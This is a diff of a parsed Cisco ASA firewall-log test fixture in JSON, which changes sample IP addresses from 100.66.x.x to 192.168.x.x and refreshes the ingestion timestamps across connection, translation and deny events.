@@ -5785,8 +5785,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094875462Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:100.66.192.44/80 (100.66.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)",
+ "ingested": "2021-12-09T13:32:20.604154700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -5802,7 +5802,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.192.44",
+ "mapped_source_ip": "192.168.192.44",
 "connection_id": "11788",
 "source_interface": "outside",
 "mapped_destination_port": 1460
@@ -5840,8 +5840,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094877221Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267 duration 0:00:30",
+ "ingested": "2021-12-09T13:32:20.604158400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -5866,8 +5866,8 @@
 },
 "destination": {
 "port": 8277,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1385,
@@ -5907,7 +5907,7 @@
 ],
 "ip": [
 "172.31.156.80",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -5915,8 +5915,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094878959Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:100.66.98.44/8277",
+ "ingested": "2021-12-09T13:32:20.604161700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -5949,8 +5949,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
 },
 "tags": [
 "preserve_original_event"
@@ -5985,7 +5985,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.19.254",
+ "192.168.19.254",
 "172.31.156.80"
 ]
 },
@@ -5994,8 +5994,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094880685Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:100.66.19.254/80 (100.66.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)",
+ "ingested": "2021-12-09T13:32:20.604165800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -6011,7 +6011,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.156.80",
- "mapped_source_ip": "100.66.19.254",
+ "mapped_source_ip": "192.168.19.254",
 "connection_id": "11797",
 "source_interface": "outside",
 "mapped_destination_port": 1385
@@ -6049,8 +6049,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094882400Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268 duration 0:00:30",
+ "ingested": "2021-12-09T13:32:20.604171300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -6096,8 +6096,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094884256Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269 duration 0:00:30",
+ "ingested": "2021-12-09T13:32:20.604177Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -6143,8 +6143,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094886688Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270 duration 0:00:30",
+ "ingested": "2021-12-09T13:32:20.604182400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -6190,8 +6190,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094888571Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271 duration 0:00:30",
+ "ingested": "2021-12-09T13:32:20.604187800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -6237,8 +6237,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094890305Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272 duration 0:00:30",
+ "ingested": "2021-12-09T13:32:20.604193200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -6284,8 +6284,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094892033Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273 duration 0:00:30",
+ "ingested": "2021-12-09T13:32:20.604198500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -6315,8 +6315,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.115.46",
- "ip": "100.66.115.46"
+ "address": "192.168.115.46",
+ "ip": "192.168.115.46"
 },
 "tags": [
 "preserve_original_event"
@@ -6351,7 +6351,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.115.46",
+ "192.168.115.46",
 "172.31.156.80"
 ]
 },
@@ -6362,8 +6362,8 @@
 "severity": 6,
 "duration": 325000000000,
 "reason": "TCP FINs",
- "ingested": "2021-07-19T09:06:25.094893764Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:100.66.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs",
+ "ingested": "2021-12-09T13:32:20.604204Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs",
 "code": "302014",
 "kind": "event",
 "start": "2018-10-10T12:29:31.000Z",
@@ -6400,8 +6400,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
 },
 "tags": [
 "preserve_original_event"
@@ -6436,7 +6436,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.19.254",
+ "192.168.19.254",
 "172.31.156.80"
 ]
 },
@@ -6447,8 +6447,8 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP Reset-I",
- "ingested": "2021-07-19T09:06:25.094895508Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:100.66.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I",
+ "ingested": "2021-12-09T13:32:20.604209400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I",
 "code": "302014",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -6480,8 +6480,8 @@
 },
 "destination": {
 "port": 8278,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1386,
@@ -6521,7 +6521,7 @@
 ],
 "ip": [
 "172.31.156.80",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -6529,8 +6529,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094897282Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:100.66.98.44/8278",
+ "ingested": "2021-12-09T13:32:20.604214700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -6563,8 +6563,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.115.46",
- "ip": "100.66.115.46"
+ "address": "192.168.115.46",
+ "ip": "192.168.115.46"
 },
 "tags": [
 "preserve_original_event"
@@ -6599,7 +6599,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.115.46",
+ "192.168.115.46",
 "172.31.156.80"
 ]
 },
@@ -6608,8 +6608,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094899098Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:100.66.115.46/80 (100.66.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)",
+ "ingested": "2021-12-09T13:32:20.604220100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -6625,7 +6625,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.156.80",
- "mapped_source_ip": "100.66.115.46",
+ "mapped_source_ip": "192.168.115.46",
 "connection_id": "11798",
 "source_interface": "outside",
 "mapped_destination_port": 1386
@@ -6647,8 +6647,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
 },
 "tags": [
 "preserve_original_event"
@@ -6682,7 +6682,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.19.254",
+ "192.168.19.254",
 "172.31.98.44"
 ]
 },
@@ -6691,8 +6691,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.094900856Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.604225400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -6728,8 +6728,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
 },
 "tags": [
 "preserve_original_event"
@@ -6763,7 +6763,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.19.254",
+ "192.168.19.254",
 "172.31.98.44"
 ]
 },
@@ -6772,8 +6772,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.094902629Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.604230800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -6809,8 +6809,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
 },
 "tags": [
 "preserve_original_event"
@@ -6844,7 +6844,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.19.254",
+ "192.168.19.254",
 "172.31.98.44"
 ]
 },
@@ -6853,8 +6853,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.094904347Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.604236200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -6890,8 +6890,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
 },
 "tags": [
 "preserve_original_event"
@@ -6925,7 +6925,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.19.254",
+ "192.168.19.254",
 "172.31.98.44"
 ]
 },
@@ -6934,8 +6934,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.094906076Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.604241500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -6971,8 +6971,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
 },
 "tags": [
 "preserve_original_event"
@@ -7006,7 +7006,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.19.254",
+ "192.168.19.254",
 "172.31.98.44"
 ]
 },
@@ -7015,8 +7015,8 @@
  },
  "event": {
  "severity": 4,
- "ingested": "2021-07-19T09:06:25.094907817Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.604246900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
  "code": "106023",
  "kind": "event",
  "action": "firewall-rule",
@@ -7052,8 +7052,8 @@
  },
  "source": {
  "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
  },
  "tags": [
  "preserve_original_event"
@@ -7087,7 +7087,7 @@
  "localhost"
  ],
  "ip": [
- "100.66.19.254",
+ "192.168.19.254",
  "172.31.98.44"
  ]
  },
@@ -7096,8 +7096,8 @@
  },
  "event": {
  "severity": 4,
- "ingested": "2021-07-19T09:06:25.094909522Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.604252200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
  "code": "106023",
  "kind": "event",
  "action": "firewall-rule",
@@ -7133,8 +7133,8 @@
  },
  "source": {
  "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
  },
  "tags": [
  "preserve_original_event"
@@ -7168,7 +7168,7 @@
  "localhost"
  ],
  "ip": [
- "100.66.19.254",
+ "192.168.19.254",
  "172.31.98.44"
  ]
  },
@@ -7177,8 +7177,8 @@
  },
  "event": {
  "severity": 4,
- "ingested": "2021-07-19T09:06:25.094911262Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.604257700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
  "code": "106023",
  "kind": "event",
  "action": "firewall-rule",
@@ -7214,8 +7214,8 @@
  },
  "source": {
  "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
  },
  "tags": [
  "preserve_original_event"
@@ -7249,7 +7249,7 @@
  "localhost"
  ],
  "ip": [
- "100.66.19.254",
+ "192.168.19.254",
  "172.31.98.44"
  ]
  },
@@ -7258,8 +7258,8 @@
  },
  "event": {
  "severity": 4,
- "ingested": "2021-07-19T09:06:25.094913010Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.604261500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
  "code": "106023",
  "kind": "event",
  "action": "firewall-rule",
@@ -7295,8 +7295,8 @@
  },
  "source": {
  "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
  },
  "tags": [
  "preserve_original_event"
@@ -7330,7 +7330,7 @@
  "localhost"
  ],
  "ip": [
- "100.66.19.254",
+ "192.168.19.254",
  "172.31.98.44"
  ]
  },
@@ -7339,8 +7339,8 @@
  },
  "event": {
  "severity": 4,
- "ingested": "2021-07-19T09:06:25.094914740Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.604265800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
  "code": "106023",
  "kind": "event",
  "action": "firewall-rule",
@@ -7376,8 +7376,8 @@
  },
  "source": {
  "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
  },
  "tags": [
  "preserve_original_event"
@@ -7411,7 +7411,7 @@
  "localhost"
  ],
  "ip": [
- "100.66.19.254",
+ "192.168.19.254",
  "172.31.98.44"
  ]
  },
@@ -7420,8 +7420,8 @@
  },
  "event": {
  "severity": 4,
- "ingested": "2021-07-19T09:06:25.094916454Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.604270500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
  "code": "106023",
  "kind": "event",
  "action": "firewall-rule",
@@ -7457,8 +7457,8 @@
  },
  "source": {
  "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
  },
  "tags": [
  "preserve_original_event"
@@ -7492,7 +7492,7 @@
  "localhost"
  ],
  "ip": [
- "100.66.19.254",
+ "192.168.19.254",
  "172.31.98.44"
  ]
  },
@@ -7501,8 +7501,8 @@
  },
  "event": {
  "severity": 4,
- "ingested": "2021-07-19T09:06:25.094918212Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.604276700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
  "code": "106023",
  "kind": "event",
  "action": "firewall-rule",
@@ -7538,8 +7538,8 @@
  },
  "source": {
  "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
  },
  "tags": [
  "preserve_original_event"
@@ -7573,7 +7573,7 @@
  "localhost"
  ],
  "ip": [
- "100.66.19.254",
+ "192.168.19.254",
  "172.31.98.44"
  ]
  },
@@ -7582,8 +7582,8 @@
  },
  "event": {
  "severity": 4,
- "ingested": "2021-07-19T09:06:25.094919940Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.604280200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
  "code": "106023",
  "kind": "event",
  "action": "firewall-rule",
@@ -7619,8 +7619,8 @@
  },
  "source": {
  "port": 80,
- "address": "100.66.19.254",
- "ip": "100.66.19.254"
+ "address": "192.168.19.254",
+ "ip": "192.168.19.254"
  },
  "tags": [
  "preserve_original_event"
@@ -7654,7 +7654,7 @@
  "localhost"
  ],
  "ip": [
- "100.66.19.254",
+ "192.168.19.254",
  "172.31.98.44"
  ]
  },
@@ -7663,8 +7663,8 @@
  },
  "event": {
  "severity": 4,
- "ingested": "2021-07-19T09:06:25.094921698Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.604284500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]",
  "code": "106023",
  "kind": "event",
  "action": "firewall-rule",
@@ -7695,8 +7695,8 @@
  },
  "destination": {
  "port": 8279,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
  },
  "source": {
  "port": 1275,
@@ -7736,7 +7736,7 @@
  ],
  "ip": [
  "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
  ]
  },
  "host": {
@@ -7744,8 +7744,8 @@
  },
  "event": {
  "severity": 6,
- "ingested": "2021-07-19T09:06:25.094923445Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:100.66.98.44/8279",
+ "ingested": "2021-12-09T13:32:20.604289900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279",
  "code": "305011",
  "kind": "event",
  "action": "firewall-rule",
@@ -7778,8 +7778,8 @@
  },
  "source": {
  "port": 80,
- "address": "100.66.205.99",
- "ip": "100.66.205.99"
+ "address": "192.168.205.99",
+ "ip": "192.168.205.99"
  },
  "tags": [
  "preserve_original_event"
@@ -7814,7 +7814,7 @@
  "localhost"
  ],
  "ip": [
- "100.66.205.99",
+ "192.168.205.99",
  "172.31.98.44"
  ]
  },
@@ -7823,8 +7823,8 @@
  },
  "event": {
  "severity": 6,
- "ingested": "2021-07-19T09:06:25.094925168Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)",
+ "ingested": "2021-12-09T13:32:20.604294900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)",
  "code": "302013",
  "kind": "event",
  "action": "firewall-rule",
@@ -7840,7 +7840,7 @@
  "destination_interface": "inside",
  "mapped_source_port": 80,
  "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.205.99",
+ "mapped_source_ip": "192.168.205.99",
  "connection_id": "11799",
  "source_interface": "outside",
  "mapped_destination_port": 1275
@@ -7857,8 +7857,8 @@
  },
  "destination": {
  "port": 1190,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
  },
  "source": {
  "port": 56132,
@@ -7898,7 +7898,7 @@
  ],
  "ip": [
  "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
  ]
  },
  "host": {
@@ -7906,8 +7906,8 @@
  },
  "event": {
  "severity": 6,
- "ingested": "2021-07-19T09:06:25.094926948Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1190",
+ "ingested": "2021-12-09T13:32:20.604298500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190",
  "code": "305011",
  "kind": "event",
  "action": "firewall-rule",
@@ -7940,8 +7940,8 @@
  },
  "source": {
  "port": 53,
- "address": "100.66.14.30",
- "ip": "100.66.14.30"
+ "address": "192.168.14.30",
+ "ip": "192.168.14.30"
  },
  "tags": [
  "preserve_original_event"
@@ -7976,7 +7976,7 @@
  "localhost"
  ],
  "ip": [
- "100.66.14.30",
+ "192.168.14.30",
  "172.31.98.44"
  ]
  },
@@ -7985,8 +7985,8 @@
  },
  "event": {
  "severity": 6,
- "ingested": "2021-07-19T09:06:25.094928671Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:100.66.14.30/53 (100.66.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
+ "ingested": "2021-12-09T13:32:20.604302700Z",
